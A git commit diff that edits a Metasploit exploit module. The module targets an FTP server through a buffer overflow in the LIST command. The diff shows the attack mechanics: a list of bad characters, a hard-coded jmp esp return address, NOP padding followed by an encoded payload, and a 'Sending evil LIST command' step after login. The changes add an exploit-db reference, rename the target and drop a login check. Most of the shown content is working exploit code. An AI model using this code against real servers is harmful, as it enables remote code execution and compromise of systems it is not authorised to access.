minor edits

bug/bundler_fix
Doug P 2013-03-13 17:48:37 -04:00
parent fa5c988110
commit 1f7b2a8e9f
1 changed files with 3 additions and 10 deletions

View File

@ -26,6 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
[
[ 'OSVDB', '90815'],
[ 'EDB', '24557'],
[ 'URL', 'http://www.exploit-db.com/exploits/24557/'],
],
'DefaultOptions' =>
{
@ -37,11 +38,10 @@ class Metasploit4 < Msf::Exploit::Remote
{
'Space' => 950,
'BadChars' => "\x00\x0a\x0d\x20\xff",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Universal', { 'Ret' => 0x10028283 } ], # jmp esp
[ 'Automatic Targeting', { 'Ret' => 0x10028283, 'auto' => true } ], # jmp esp
],
'DisclosureDate' => 'Feb 27 2013'))
@ -61,14 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
buf << make_nops(50) + payload.encoded
sock.put("USER #{datastore['FTPUSER']}\r\n")
sock.put("PASS #{datastore['FTPPASS']}\r\n")
res = sock.get(-1,3)
if(res.match(/230 Access allowed\./))
print_good("Login successful")
else
print_status("Bad username/password")
end
sleep 1
sleep 0.5
print_status("Sending evil LIST command")
sock.put("LIST #{buf}\r\n")